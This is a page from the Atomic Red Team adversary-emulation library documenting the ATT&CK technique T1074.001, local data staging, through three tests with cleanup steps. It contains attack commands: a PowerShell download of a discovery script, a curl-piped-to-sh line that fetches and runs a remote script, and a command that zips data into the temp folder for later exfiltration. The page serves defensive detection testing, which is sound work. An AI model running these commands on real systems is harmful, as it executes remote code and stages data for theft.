Skip to content
Atomic Red Team
atomics
T1074.001

T1074.001 - Data Staged: Local Data Staging

Description from ATT&CK (opens in a new tab)

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data (opens in a new tab). Interactive command shells may be used, and common functionality within cmd (opens in a new tab) and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)

Atomic Tests


Atomic Test #1 - Stage data from Discovery.bat

Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.

Supported Platforms: Windows

auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f

Inputs:

NameDescriptionTypeDefault Value
output_fileLocation to save downloaded discovery.bat filepath$env:TEMP\discovery.bat

Attack Commands: Run with powershell!

Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}

Cleanup Commands:

Remove-Item -Force #{output_file} -ErrorAction Ignore


Atomic Test #2 - Stage data from Discovery.sh

Utilize curl to download discovery.sh and execute a basic information gathering shell script

Supported Platforms: Linux, macOS

auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066

Inputs:

NameDescriptionTypeDefault Value
output_fileLocation to save downloaded discovery.bat filepath/tmp/T1074.001_discovery.log

Attack Commands: Run with sh!

curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}

Cleanup Commands:

rm #{output_file}

Dependencies: Run with sh!

Description: Check if curl is installed on the machine.
Check Prereq Commands:
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Get Prereq Commands:
which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl


Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp

Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.

Supported Platforms: Windows

auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a

Inputs:

NameDescriptionTypeDefault Value
output_fileLocation to save zipped file or folderpath$env:TEMP\Folder_to_zip.zip
input_fileLocation of file or folder to zippathPathToAtomicsFolder\T1074.001\bin\Folder_to_zip

Attack Commands: Run with powershell!

Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force

Cleanup Commands:

Remove-Item -Path #{output_file} -ErrorAction Ignore